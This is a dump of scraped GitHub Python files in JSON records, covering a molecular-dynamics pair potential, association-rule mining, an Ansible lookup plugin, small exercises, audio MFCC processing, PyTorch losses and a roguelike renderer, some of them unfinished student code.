0.5, -0.5],\n [-0.5, 0.5, 0.5],\n [0.5, -0.5, -0.5],\n [0.5, -0.5, 0.5],\n [0.5, 0.5, -0.5],\n [0.5, 0.5, 0.5]]\n\n cube = coxeter.shapes.ConvexPolyhedron(cube_verts)\n\n alj.params[(\"A\", \"A\")] = dict(epsilon=2.0,\n sigma_i=1.0,\n sigma_j=1.0,\n alpha=1,\n )\n alj.shape[\"A\"] = dict(vertices=cube.vertices,\n faces=cube.faces)\n\n \"\"\"\n\n # We don't define a _cpp_class_name since the dimension is a template\n # parameter in C++, so use an instance level attribute instead that is\n # created in _attach based on the dimension of the associated simulation.\n\n def __init__(self, nlist, default_r_cut=None):\n super().__init__(nlist, default_r_cut, 'none')\n params = TypeParameter(\n 'params', 'particle_types',\n TypeParameterDict(epsilon=float,\n sigma_i=float,\n sigma_j=float,\n alpha=int,\n contact_ratio_i=0.15,\n contact_ratio_j=0.15,\n average_simplices=True,\n len_keys=2))\n\n shape = TypeParameter(\n 'shape', 'particle_types',\n TypeParameterDict(vertices=[(float, float, float)],\n faces=[[int]],\n rounding_radii=OnlyIf(\n to_type_converter((float, float, float)),\n preprocess=self._to_three_tuple),\n len_keys=1,\n _defaults={'rounding_radii', (0.0, 0.0, 0.0)}))\n\n self._extend_typeparam((params, shape))\n\n def _attach_hook(self):\n self._cpp_class_name = \"AnisoPotentialPairALJ{}\".format(\n \"2D\" if self._simulation.state.box.is2D else \"3D\")\n\n super()._attach_hook()\n\n @staticmethod\n def _to_three_tuple(value):\n if isinstance(value, Sequence):\n return value\n if isinstance(value, Number):\n return (value, value, value)\n else:\n raise ValueError(f\"Expected a float or tuple object got {value}\")\n\n @log(category=\"object\", requires_run=True)\n def type_shapes(self):\n \"\"\"`list` [`dict` [`str`, ``any``]]: The shape specification for use \\\n with GSD files for visualization.\n\n This is not meant to be used for access to shape information in Python.\n See the attribute ``shape`` for programatic assess. 
Use this property to\n log shape for visualization and storage through the GSD file type.\n \"\"\"\n return self._return_type_shapes()\n","repo_name":"glotzerlab/hoomd-blue","sub_path":"hoomd/md/pair/aniso.py","file_name":"aniso.py","file_ext":"py","file_size_in_byte":21802,"program_lang":"python","lang":"en","doc_type":"code","stars":291,"dataset":"github-code","pt":"5"} +{"seq_id":"19899233167","text":"import random \nlist_a = [[],[]]\nmatrix= []\n\nfor i in range(2): \n\tlist_a[i] = random.sample(range(0,9),8)\n\nfor i in range(len(list_a[0])):\n\tval = [list_a[0][i]+s for s in list_a[1]]\n\tmatrix.append(val)\n#print(len(matrix))\n#print(['%s \\r\\n' % matrix[i][:] for i in range(5)]) \n\ndef path_find(G,start_v): # G is a matrix, start_v = (row ,col) : list\n\tcurrent_node = start_v \n\tvisited_que = G[start_v[0]][start_v[1]]\n\tn = len(G)\n\tunvisited_node = [[None]*n]*n\n\t\n\t\n\t\n\treturn distance \n\nprint(path_find(matrix,))\n","repo_name":"verpassen/python-test","sub_path":"練習/path finding/maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7221908773","text":"import csv\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as mlt\r\nfrom apyori import apriori\r\n\r\n\r\ndef read_data(filename):\r\n with open(filename, 'r') as f:\r\n reader = csv.DictReader(f, delimiter=',')\r\n headers = reader.fieldnames\r\n census = []\r\n census_dict = {}\r\n for header in headers:\r\n census_dict[header] = None\r\n print(headers)\r\n for line in reader:\r\n for header in headers:\r\n if line[header] != '0':\r\n census_dict[header] = line[header]\r\n else:\r\n census_dict[header] = 'None'\r\n census.append(census_dict)\r\n census_dict = {}\r\n return census\r\n\r\n\r\ndef toString(dic):\r\n dic_str = ''\r\n for key in dic.keys():\r\n dic_str += (key + '=' + dic[key] + ',')\r\n dic_str = dic_str[:-1]\r\n return dic_str\r\n\r\n\r\ndef arrangingRules(rules):\r\n x_list, xy_list = [], []\r\n for rule in rules:\r\n x = rule.split('}=>{')[0][1:].split(',')\r\n y = rule.split('}=>{')[1][:-1].split(',')\r\n x_list.append(x)\r\n xy_list.append(x + y)\r\n print(x_list, xy_list)\r\n census_data = pd.read_csv('census.csv', header=None)\r\n num_records = len(census_data)\r\n print(num_records)\r\n records = []\r\n for i in range(0, num_records):\r\n records.append([str(census_data.values[i, j]) for j in range(0, 12)])\r\n print(records)\r\n association_rules = apriori(records, min_support=0.3, min_confidence=0.2, min_lift=1, min_length=3, max_length=3)\r\n association_results = list(association_rules)\r\n print(len(association_results))\r\n results = []\r\n for item in association_results:\r\n print(item)\r\n for item in association_results:\r\n pair = item[0]\r\n items = [x for x in pair]\r\n value0 = \",\".join(items)\r\n value2 = str(item[1]) # to convert into object\r\n rows = (value0, value2)\r\n results.append(rows)\r\n labels = ['Attribute', 'Support']\r\n census = pd.DataFrame.from_records(results, columns=labels)\r\n x_support, xy_support = [], []\r\n for j in range(len(x_list)):\r\n for i in range(len(census)):\r\n element = census['Attribute'][i]\r\n if len(element) == sum([len(item) for item in x_list[j]]) + len(x_list[j]) - 1:\r\n match = True\r\n for rule in x_list[j]:\r\n if rule not in element:\r\n match = False\r\n if match:\r\n x_support.append(census['Support'][i])\r\n if len(element) == sum([len(item) for item in xy_list[j]]) + 
len(xy_list[j]) - 1:\r\n match = True\r\n for rule in xy_list[j]:\r\n if rule not in element:\r\n match = False\r\n if match:\r\n xy_support.append(census['Support'][i])\r\n print(x_support, xy_support)\r\n confidences = [float(xy) / float(x) for x, xy in zip(x_support, xy_support)]\r\n print(confidences)\r\n result = list(zip(rules, confidences))\r\n print(result)\r\n result = sorted(result, key=lambda x: x[1], reverse=True)\r\n for rule, confid in result:\r\n print(rule)\r\n\r\n\r\ndef arrangingRules2(rules):\r\n x_list, xy_list = [], []\r\n for rule in rules:\r\n x = rule.split('}=>{')[0][1:].split(',')\r\n y = rule.split('}=>{')[1][:-1].split(',')\r\n x_list.append(x)\r\n xy_list.append(x + y)\r\n census_data = pd.read_csv('census.csv', header=None)\r\n num_records = len(census_data)\r\n records = []\r\n for i in range(0, num_records):\r\n records.append([str(census_data.values[i, j]) for j in range(0, 12)])\r\n x_support, xy_support = [], []\r\n for j in range(len(x_list)):\r\n x_count = 0\r\n xy_count = 0\r\n for i in range(len(records)):\r\n match = True\r\n for rule in x_list[j]:\r\n if rule not in records[i]:\r\n match = False\r\n if match:\r\n x_count += 1\r\n match = True\r\n for rule in xy_list[j]:\r\n if rule not in records[i]:\r\n match = False\r\n if match:\r\n xy_count += 1\r\n x_support.append(x_count / 30162)\r\n xy_support.append(xy_count / 30162)\r\n confidences = [float(xy) / float(x) for x, xy in zip(x_support, xy_support)]\r\n result = list(zip(rules, confidences))\r\n result = sorted(result, key=lambda x: x[1], reverse=True)\r\n rules = []\r\n for rule, confid in result:\r\n rules.append(rule)\r\n return rules\r\n\r\n\r\nif __name__ == '__main__':\r\n rules = ['{native-country=United-States,capital-gain=None}=>{capital-loss=None}',\r\n '{capital-gain=None,capital-loss=None}=>{native-country=United-States}',\r\n '{native-country=United-States,capital-loss=None}=>{capital-gain=None}']\r\n arrangingRules(rules)\r\n","repo_name":"xinkaichen97/HackerRank","sub_path":"Data Science/census.py","file_name":"census.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"311933612","text":"from django.contrib import admin\nfrom django.urls import path,re_path\nfrom . 
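Both `arrangingRules` variants in the census record above reduce to the same identity: confidence(X => Y) = support(X union Y) / support(X), with supports counted over the transaction list. A minimal self-contained sketch of that computation (hypothetical helper name):

```python
def confidence(records, x_items, xy_items):
    # support(S) = fraction of transactions containing every item of S.
    n = len(records)
    supp_x = sum(all(i in r for i in x_items) for r in records) / n
    supp_xy = sum(all(i in r for i in xy_items) for r in records) / n
    return supp_xy / supp_x

rows = [['a', 'b'], ['a', 'b', 'c'], ['a'], ['b', 'c']]
print(confidence(rows, ['a'], ['a', 'b']))  # (2/4) / (3/4) = 0.666...
```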
import views\napp_name=\"article\"\n\nurlpatterns=[\n path(\"dashboard/\",views.dashboard,name=\"dashboard\"),\n path(\"createarticle/\",views.createarticle,name=\"createarticle\"),\n path(\"article/\",views.article.as_view(),name=\"article\"),\n path(\"update/\",views.update.as_view(),name=\"update\"),\n path(\"delete/\",views.deleteArticle,name=\"delete\"),\n path(\"\",views.articles,name=\"articles\"),\n re_path(r'^update/(?P\\d+)/$', views.update.as_view())\n \n]\n\n","repo_name":"Keremm1/django_blog","sub_path":"article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"3338565498","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\ntry:\n # Python 2\n from itertools import izip\nexcept ImportError:\n # Python 3\n izip = zip\n\nfrom itertools import cycle\n\nimport ansible.errors as errors\ntry:\n from __main__ import display\nexcept ImportError:\n from ansible.utils.display import Display\n display = Display()\n\ntry:\n # ansible 2.0 - 2.3\n from ansible.plugins.lookup import LookupBase\n from ansible.utils.listify import listify_lookup_plugin_terms\n from jinja2.exceptions import UndefinedError\n\n class LookupModule(LookupBase):\n \"\"\"\n Zip two arrays, thereby cycling through the second array:\n [1, 2, 3], [4, 5] -> [1, 4], [2, 5], [3, 4]\n \"\"\"\n def _lookup_variables(self, terms):\n results = []\n for x in terms:\n try:\n intermediate = listify_lookup_plugin_terms(x, templar=self._templar, loader=self._loader)\n except UndefinedError as e:\n raise errors.AnsibleUndefinedVariable(\n \"One of the nested variables was undefined. The error was: %s\" % e)\n results.append(intermediate)\n return results\n\n def run(self, terms, variables, **kwargs):\n terms = self._lookup_variables(terms)\n my_list = terms[:]\n if len(my_list) != 2:\n raise errors.AnsibleError(\"with_zip_cycle requires exactly two lists\")\n return [self._flatten(x) for x in izip(my_list[0], cycle(my_list[1]))]\n\nexcept ImportError:\n # ansible-1.9.x\n from ansible.utils import listify_lookup_plugin_terms\n\n def flatten(terms):\n ret = []\n for term in terms:\n if isinstance(term, list):\n ret.extend(term)\n elif isinstance(term, tuple):\n ret.extend(term)\n else:\n ret.append(term)\n return ret\n\n class LookupModule(object):\n \"\"\"\n Zip two arrays, thereby cycling through the second array:\n [1, 2, 3], [4, 5] -> [1, 4], [2, 5], [3, 4]\n \"\"\"\n def __init__(self, basedir=None, **kwargs):\n self.basedir = basedir\n\n def __lookup_injects(self, terms, inject):\n results = []\n for x in terms:\n intermediate = listify_lookup_plugin_terms(x, self.basedir, inject)\n results.append(intermediate)\n return results\n\n def run(self, terms, inject=None, **kwargs):\n terms = listify_lookup_plugin_terms(terms, self.basedir, inject)\n terms = self.__lookup_injects(terms, inject)\n my_list = terms[:]\n if len(my_list) != 2:\n raise errors.AnsibleError(\"with_zip_cycle requires exactly two lists\")\n res = [flatten(x) for x in izip(my_list[0], cycle(my_list[1]))]\n print(\"res: {}\".format(res))\n return res\n","repo_name":"wireapp/ansible-cassandra","sub_path":"lookup_plugins/zip_cycle.py","file_name":"zip_cycle.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"12820694542","text":"class Solution:\n def rangeSum(self, nums: List[int], n: 
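Stripped of the Ansible plugin machinery, the `zip_cycle` lookup above simply pairs the first list with a cycled copy of the second, exactly as its docstring states: `[1, 2, 3], [4, 5] -> [1, 4], [2, 5], [3, 4]`. The core behaviour in plain Python:

```python
from itertools import cycle

def zip_cycle(a, b):
    # zip() stops at the end of the first list; cycle() repeats the second.
    return [list(pair) for pair in zip(a, cycle(b))]

print(zip_cycle([1, 2, 3], [4, 5]))  # [[1, 4], [2, 5], [3, 4]]
```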
int, left: int, right: int) -> int:\n ans = []\n length = len(nums)\n \n for i in range(length):\n val = nums[i]\n ans.append(val)\n for j in range(i+1, length):\n val += nums[j]\n ans.append(val)\n \n ans.sort()\n return sum(ans[left-1:right]) % (10**9 + 7)\n \n ","repo_name":"Maunil/Leetcode_Solutions","sub_path":"1508. Range Sum of Sorted Subarray Sums.py","file_name":"1508. Range Sum of Sorted Subarray Sums.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"72519283673","text":"# Задание № Алгоритм\n# 1. Даны два значения ( numbers , desired_sum )\n# 2. Первая это список из чисел\n# 3. Вторая это число которое должно получиться из двух чисел\n# Смысл :\n# Нужно сделать так чтобы возвращался индекс двух чисел которые в сумме возвращают желаемую сумму\n# Например есть список из таких чисел [2, 7, 11, 15] желаемая сумма является число 9 , значит должен\n# возвращаться индекс [0, 1] потому что только сумма этих двух чисел является желаемой\n# Подсказка : Нужно использовать циклы for\n# ДОП домашка :\n# Сделать в классахdd\n \nnum = 9\nlist_num = [2, 7, 3, 7, 2, 2]\n\nclass R:\n def __init__(self, lst) -> None:\n self.lst = lst\n def find_i(self, num):\n result = []\n for i in range(len(self.lst)):\n for k in range(i, len(self.lst)):\n if self.lst[i] + self.lst[k] == num:\n result_i = (i, k)\n result.append(result_i)\n \n return result\n\n \n \nara = R(list_num)\nprint(ara.find_i(num))\n\n","repo_name":"Argen1854/Argen_homework","sub_path":"Argen_homework_6.1.py","file_name":"Argen_homework_6.1.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21013767416","text":"a, b = map(str, input().split())\r\namax = bmax = amin = bmin = ''\r\nfor i in a:\r\n if i == \"5\" or i == '6':\r\n amax += '6'\r\n amin += '5'\r\n else:\r\n amax += i\r\n amin += i\r\nfor i in b:\r\n if i == \"5\" or i == '6':\r\n bmax += '6'\r\n bmin += '5'\r\n else:\r\n bmax += i\r\n bmin += i\r\nprint(int(amin) + int(bmin), int(amax) + int(bmax))","repo_name":"ndhung1st/200baicodethieunhi","sub_path":"chu_de_toan_hoc/bai59.py","file_name":"bai59.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27953609647","text":"import tcod as libtcod\n\nfrom components.question import Question\n\ndef render_all(con, panel, entities, player, game_map, fov_map, fov_recompute, message_log, screen_width, screen_height, bar_width, panel_height, panel_y, colors):\n if fov_recompute:\n for y in range(game_map.height):\n for x in range(game_map.width):\n visible = libtcod.map_is_in_fov(fov_map, x, y)\n wall = game_map.tiles[x][y].block_sight\n\n if visible:\n if wall:\n libtcod.console_set_char_background(con, x, y, colors.get('light_wall'), libtcod.BKGND_SET)\n else:\n libtcod.console_set_char_background(con, x, y, colors.get('light_ground'), libtcod.BKGND_SET)\n game_map.tiles[x][y].explored = True\n elif game_map.tiles[x][y].explored:\n if wall:\n libtcod.console_set_char_background(con, x, y, colors.get('dark_wall'), libtcod.BKGND_SET)\n else:\n libtcod.console_set_char_background(con, x, y, colors.get('dark_ground'), libtcod.BKGND_SET)\n\n # Draw all entities in the list\n for entity in entities:\n if entity is Question:\n if entity.question.answered:\n continue\n\n draw_entity(con, entity, fov_map)\n\n libtcod.console_blit(con, 0, 0, 
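The homework record above (task text in Russian: given a list of numbers and a desired sum, return the index pairs whose values add up to that sum) scans all pairs with a double loop. A dictionary of previously seen values yields the same pairs in a single pass; a hedged sketch with a hypothetical helper name:

```python
def find_pairs(nums, target):
    seen = {}    # value -> indices where it has appeared so far
    pairs = []
    for i, v in enumerate(nums):
        # Every earlier occurrence of (target - v) completes a pair with i.
        for j in seen.get(target - v, []):
            pairs.append((j, i))
        seen.setdefault(v, []).append(i)
    return pairs

print(find_pairs([2, 7, 3, 7, 2, 2], 9))
# [(0, 1), (0, 3), (1, 4), (3, 4), (1, 5), (3, 5)]
```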
screen_width, screen_height, 0, 0, 0)\n libtcod.console_set_default_background(panel, libtcod.black)\n libtcod.console_clear(panel)\n\n # Print the game messages, one line at a time\n y = 1\n for message in message_log.messages:\n libtcod.console_set_default_foreground(panel, message.color)\n libtcod.console_print_ex(panel, message_log.x, y, libtcod.BKGND_NONE, libtcod.LEFT, message.text)\n y += 1\n\n render_bar(panel, 1, 1, bar_width, '',\n libtcod.light_red, libtcod.darker_red\n )\n\n libtcod.console_blit(panel, 0, 0, screen_width, panel_height, 0, 0, panel_y)\n\n\ndef clear_all(con, entities):\n for entity in entities:\n clear_entity(con, entity)\n\n\ndef draw_entity(con, entity, fov_map):\n if libtcod.map_is_in_fov(fov_map, entity.x, entity.y):\n libtcod.console_set_default_foreground(con, entity.color)\n libtcod.console_put_char(con, entity.x, entity.y, entity.char, libtcod.BKGND_NONE)\n\n\ndef clear_entity(con, entity):\n # erase the character that represents this object\n libtcod.console_put_char(con, entity.x, entity.y, ' ', libtcod.BKGND_NONE)\n\ndef render_bar(panel, x, y, total_width, text, bar_color, back_color):\n libtcod.console_set_default_background(panel, back_color)\n libtcod.console_rect(panel, x, y, total_width, 1, False, libtcod.BKGND_SCREEN)\n\n libtcod.console_set_default_background(panel, bar_color)\n\n libtcod.console_set_default_foreground(panel, libtcod.white)\n libtcod.console_print_ex(panel, int(x + total_width / 2), y, libtcod.BKGND_NONE, libtcod.CENTER, text)","repo_name":"tetrica/rv-game","sub_path":"src/render_functions.py","file_name":"render_functions.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"5228293284","text":"# -*- coding:utf-8 -*-\r\nimport sys\r\nsys.setrecursionlimit(1000000)\r\n\r\nimport random\r\nimport time\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\n# 获取随机数据\r\ndef GetRandomData(size=10, min=0, max=100):\r\n ar = []\r\n for i in range(size):\r\n ar.append(random.randint(min, max))\r\n return ar\r\n\r\n\r\n# 测试, 返回测试规模和对应消耗的时间\r\ndef TestSort(test_func, min_size, max_size, step):\r\n size_list = []\r\n time_list = []\r\n for i in range(min_size, max_size, step):\r\n ar = GetRandomData(i)\r\n\r\n start = time.time()\r\n test_func(ar)\r\n end = time.time()\r\n use_time = (end - start) * 1000\r\n\r\n size_list.append(i)\r\n time_list.append(use_time)\r\n return size_list, time_list\r\n\r\n\r\n# 可视化测试函数返回的数据\r\ndef PlotTestData(test_func, size_list, time_list, *args):\r\n print('all time: {}'.format(sum(time_list)))\r\n plt.subplot(*args)\r\n plt.xlabel('size')\r\n plt.ylabel('time(ms)')\r\n plt.title(getattr(test_func, '__name__'))\r\n plt.plot(size_list, time_list)\r\n\r\n\r\n# 插入排序\r\ndef InsertionSort(ar):\r\n for j in range(1, len(ar)): # j从数组的第2个开始\r\n for i in range(0, j): # i从数组的第1个开始, 但不能超过j\r\n if ar[j] < ar[i]: # 如果 ar[j] < ar[i]\r\n temp = ar[i:j]\r\n ar[i] = ar[j] # 将 ar[j] 插入到 ar[i] 的前面\r\n ar[i+1:j+1] = temp # 并且将原来数组 ar[i] 到 ar[j-1] 的内容后移1个位置\r\n\r\n\r\n# 归并排序\r\ndef MergeSort(ar):\r\n if len(ar) == 1: # 如果数组只有1个元素,返回\r\n return ar[0:1]\r\n\r\n mid = len(ar)//2 # 如果数组元素多于1个, 则将数组分割成两份\r\n a = MergeSort(ar[0:mid]) # 并将两份继续代入函数中去\r\n b = MergeSort(ar[mid:len(ar)])\r\n\r\n c = []\r\n i = j = 0 # 分割的两份数组已分别排好序\r\n while i < len(a) and j < len(b): # 比较两份数组的元素大小, 并将它们按顺序放到一个数组中去\r\n if a[i] < b[j]:\r\n c.append(a[i])\r\n i += 1\r\n else:\r\n c.append(b[j])\r\n j += 1\r\n\r\n if i < len(a):\r\n c += a[i:len(a)]\r\n elif j 
< len(b):\r\n c += b[j:len(b)]\r\n\r\n return c # 返回合并的有序的数组\r\n\r\n\r\nif __name__ == '__main__':\r\n test_list = {'MergeSort': 121, 'InsertionSort': 122}\r\n\r\n for key, value in test_list.items():\r\n test_func = eval(key)\r\n size_list, time_list = TestSort(test_func)\r\n PlotTestData(test_func, size_list, time_list, value)\r\n\r\n plt.show()\r\n","repo_name":"xuejiekun/algo","sub_path":"Sort.py","file_name":"Sort.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4800717872","text":"#coding=utf-8\nimport librosa\nimport numpy as np\nimport pandas as pd\nimport argparse\nfrom pysndfx import AudioEffectsChain\nimport math\nimport python_speech_features\nimport scipy as sp\nfrom scipy import signal\nimport os\nfrom glob import glob\n\ndef invlogamplitude(S):\n return 10.0 ** (S / 10.0)\n\ndef reduce_noise_mfcc_down(y, sr):\n hop_length = 512\n n_mfcc = 20\n\n ## librosa\n # mfcc = extract_features_from_song(y, sr, hop_length, n_mfcc)\n # mfcc = librosa.mel_to_hz(mfcc)\n\n ## mfcc\n mfcc = python_speech_features.base.mfcc(y)\n mfcc = python_speech_features.base.logfbank(y)\n mfcc = python_speech_features.base.lifter(mfcc)\n\n sum_of_squares = []\n index = -1\n for r in mfcc:\n sum_of_squares.append(0)\n index = index + 1\n for n in r:\n sum_of_squares[index] = sum_of_squares[index] + n ** 2\n\n strongest_frame = sum_of_squares.index(max(sum_of_squares))\n hz = python_speech_features.base.mel2hz(mfcc[strongest_frame])\n\n max_hz = max(hz)\n min_hz = min(hz)\n\n speech_booster = AudioEffectsChain().highshelf(frequency=min_hz * (-1) * 1.2, gain=-12.0, slope=0.6).limiter(gain=8.0)\n y_speech_boosted = speech_booster(y)\n\n return (y_speech_boosted)\n\ndef trim_silence(y):\n y_trimmed, index = librosa.effects.trim(y, top_db=20, frame_length=2, hop_length=500)\n trimmed_length = librosa.get_duration(y) - librosa.get_duration(y_trimmed)\n return y_trimmed, trimmed_length\n\n\ndef reduce_noise_from_audio(filename):\n x, sr = load_audio_file(filename)\n x_boosted = reduce_noise_mfcc_down(x, sr)\n x_boosted, time_trimmed = trim_silence(x_boosted)\n librosa.output.write_wav(filename, x_boosted, sr)\n \n\ndef generate_audio_from_mfcc(input_shape, mfcc, sr, filename, n_mel=128, n_fft=2048):\n # Build reconstruction mappings,\n n_mfcc = mfcc.shape[0]\n dctm = librosa.filters.dct(n_mfcc, n_mel)\n mel_basis = librosa.filters.mel(sr, n_fft)\n\n # Empirical scaling of channels to get ~flat amplitude mapping.\n bin_scaling = 1.0/np.maximum(0.0005, np.sum(np.dot(mel_basis.T, mel_basis),axis=0))\n\n # Reconstruct the approximate STFT squared-magnitude from the MFCCs.\n recon_stft = bin_scaling[:, np.newaxis] * np.dot(mel_basis.T, invlogamplitude(np.dot(dctm.T, mfcc)))\n\n # Impose reconstructed magnitude on white noise STFT.\n excitation = np.random.randn(input_shape)\n E = librosa.stft(excitation)\n recon = librosa.istft(E/np.abs(E)*np.sqrt(recon_stft))\n\n # store audio in file\n librosa.output.write_wav(filename, recon, sr)\n\n # reduce noise in output file\n # reduce_noise_from_audio(filename)\n\n\n# get Mel-frequency cepstral coefficients\ndef extract_features_from_song(x, sr, hop_length=512, n_mfcc=20):\n mfcc = librosa.feature.mfcc(x, sr=sr, hop_length=hop_length, n_mfcc=n_mfcc)\n return mfcc\n\n# load music file\ndef load_audio_file(filename):\n try:\n x, sr = librosa.load(filename, res_type='kaiser_fast', offset=0, duration=30)\n except Exception as e:\n print(\"Error encountered while parsing 
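The sorting benchmark above (its comments are in Chinese: generate random data, time each sort over growing input sizes, plot size against elapsed milliseconds) has one runtime problem as written: `__main__` calls `TestSort(test_func)` although `TestSort` requires `min_size`, `max_size` and `step`, so the script raises `TypeError` before plotting. The merge step itself is standard; an English, self-contained version of it:

```python
def merge(a, b):
    # Compare the heads of two sorted lists, always taking the smaller one,
    # then append whichever tail remains.
    out, i, j = [], 0, 0
    while i < len(a) and j < len(b):
        if a[i] < b[j]:
            out.append(a[i]); i += 1
        else:
            out.append(b[j]); j += 1
    return out + a[i:] + b[j:]

print(merge([1, 4, 7], [2, 3, 9]))  # [1, 2, 3, 4, 7, 9]
```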
file: \", filename)\n print(e)\n return None\n \n return x, sr\n\ndef generate_training_data(songs, n_songs):\n data_X = np.empty([0, 20])\n\n for song in songs:\n x, sr = load_audio_file(song)\n mfcc = extract_features_from_song(x, sr, hop_length=512)\n mfcc = mfcc.transpose()\n data_X = np.concatenate((data_X, mfcc))\n \n X = pd.DataFrame(data_X)\n Y = [X.shift(-1)]\n Y.append(X)\n X = pd.concat(Y, axis=1)\n X.fillna(0, inplace=True)\n data_X = X.values\n\n print(data_X.shape)\n x, y = data_X[:, :20], data_X[:, 20:]\n x = x.reshape(int(x.shape[0] / n_songs), n_songs, x.shape[1])\n y = y.reshape(int(y.shape[0] / n_songs), n_songs, y.shape[1])\n\n print(\"Shape of X: \", x.shape)\n print(\"Shape of Y: \", y.shape)\n\n np.save(\"../../results/train_X_classical_2.npy\", x)\n np.save(\"../../results/train_Y_classical_2.npy\", y)\n\ndef main():\n parser = argparse.ArgumentParser(\n prog = 'Music Generation',\n usage = 'To generate new music sequences using MFCC features',\n description = 'python3 mfcc_to_wav.py -i [Input Filename]',\n epilog = 'MIT Licensce',\n add_help=True \n )\n parser.add_argument('-i', '--input', help = 'Input Filename', required = True)\n parser.add_argument('-o', '--output', help = 'Output Filename', required = True)\n args = parser.parse_args()\n\n input_song_list = [y for x in os.walk(args.input) for y in glob(os.path.join(x[0], '*.wav'))]\n print(\"Generating MFCCs for {0} songs.\".format(len(input_song_list)))\n generate_training_data(input_song_list, len(input_song_list))\n print(\"MFCC Generation complete!\")\n\nif __name__ == '__main__':\n main()","repo_name":"hardiksurana/music-generation","sub_path":"code/LSTM/mfcc_to_wav.py","file_name":"mfcc_to_wav.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"26573421755","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass SimpleWeightedCrossEntropy(nn.Module):\n def __init__(self, cfg):\n nn.Module.__init__(self)\n self._cfg = cfg\n\n def forward(self, output, target, meta=None, return_spatial=False):\n loss = F.cross_entropy(output, target, reduction='none')\n # If GT has padding, ignore the points that are not predictable\n if meta is not None and 'predictable_target' in meta:\n pred_index = meta['predictable_target'].long()\n else:\n pred_index = torch.ones_like(target).long()\n\n spatial_loss = loss\n if self._cfg.loss.binary_balanced:\n loss = 0.5 * loss[pred_index * target > 0].mean() + 0.5 * loss[\n pred_index * (1 - target) > 0].mean()\n else:\n loss = loss[pred_index > 0].mean()\n if return_spatial:\n return loss, spatial_loss\n return loss\n\n\nclass NonZeroWeightedCrossEntropy(SimpleWeightedCrossEntropy):\n def __init__(self, cfg):\n SimpleWeightedCrossEntropy.__init__(self, cfg)\n\n def forward(self, output, target, meta=None, return_spatial=False):\n if meta is not None and 'predictable_target' in meta:\n pred_index = meta['predictable_target']\n else:\n pred_index = torch.ones_like(target)\n\n pred_index = pred_index * (target > 0).long()\n loss = F.cross_entropy(output, (target - 1) % target.max(),\n reduction='none')\n spatial_loss = loss\n\n loss = loss[pred_index > 0].mean() if torch.sum(\n pred_index > 0) else torch.tensor(0.0).to(pred_index.device)\n if return_spatial:\n return loss, spatial_loss\n return 
loss\n","repo_name":"senthilps8/avmap","sub_path":"models/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"39228290037","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n# CODE NAME HERE\n\n# CODE DESCRIPTION HERE\n\nCreated on 2019-07-26 at 09:39\n\n@author: cook\n\"\"\"\nfrom apero.base import base\nfrom apero.core import constants\nfrom apero.core.core import drs_log\nfrom apero.core.utils import drs_recipe\nfrom apero.core.utils import drs_startup\nfrom apero.tools.module.testing import drs_stats\n\n\n# =============================================================================\n# Define variables\n# =============================================================================\n__NAME__ = 'apero_stats.py'\n__INSTRUMENT__ = 'None'\n__PACKAGE__ = base.__PACKAGE__\n__version__ = base.__version__\n__author__ = base.__author__\n__date__ = base.__date__\n__release__ = base.__release__\n# Get Logging function\nWLOG = drs_log.wlog\n# Get Recipe class\nDrsRecipe = drs_recipe.DrsRecipe\n# Get parameter class\nParamDict = constants.ParamDict\n\n\n# =============================================================================\n# Define functions\n# =============================================================================\n# All recipe code goes in _main\n# Only change the following from here:\n# 1) function calls (i.e. main(arg1, arg2, **kwargs)\n# 2) fkwargs (i.e. fkwargs=dict(arg1=arg1, arg2=arg2, **kwargs)\n# 3) config_main outputs value (i.e. None, pp, reduced)\n# Everything else is controlled from recipe_definition\ndef main(**kwargs):\n \"\"\"\n Main function for apero_log_stats.py\n\n :param kwargs: additional keyword arguments\n\n :keyword debug: int, debug level (0 for None)\n\n :returns: dictionary of the local space\n :rtype: dict\n \"\"\"\n # assign function calls (must add positional)\n fkwargs = dict(**kwargs)\n # ----------------------------------------------------------------------\n # deal with command line inputs / function call inputs\n recipe, params = drs_startup.setup(__NAME__, __INSTRUMENT__, fkwargs)\n # solid debug mode option\n if kwargs.get('DEBUG0000', False):\n return recipe, params\n # ----------------------------------------------------------------------\n # run main bulk of code (catching all errors)\n llmain, success = drs_startup.run(__main__, recipe, params)\n # ----------------------------------------------------------------------\n # End Message\n # ----------------------------------------------------------------------\n return drs_startup.end_main(params, llmain, recipe, success, outputs='None')\n\n\ndef __main__(recipe: DrsRecipe, params: ParamDict):\n \"\"\"\n Main code: should only call recipe and params (defined from main)\n\n :param recipe: DrsRecipe, the recipe class using this function\n :param params: ParamDict, the parameter dictionary of constants\n\n :return: dictionary containing the local 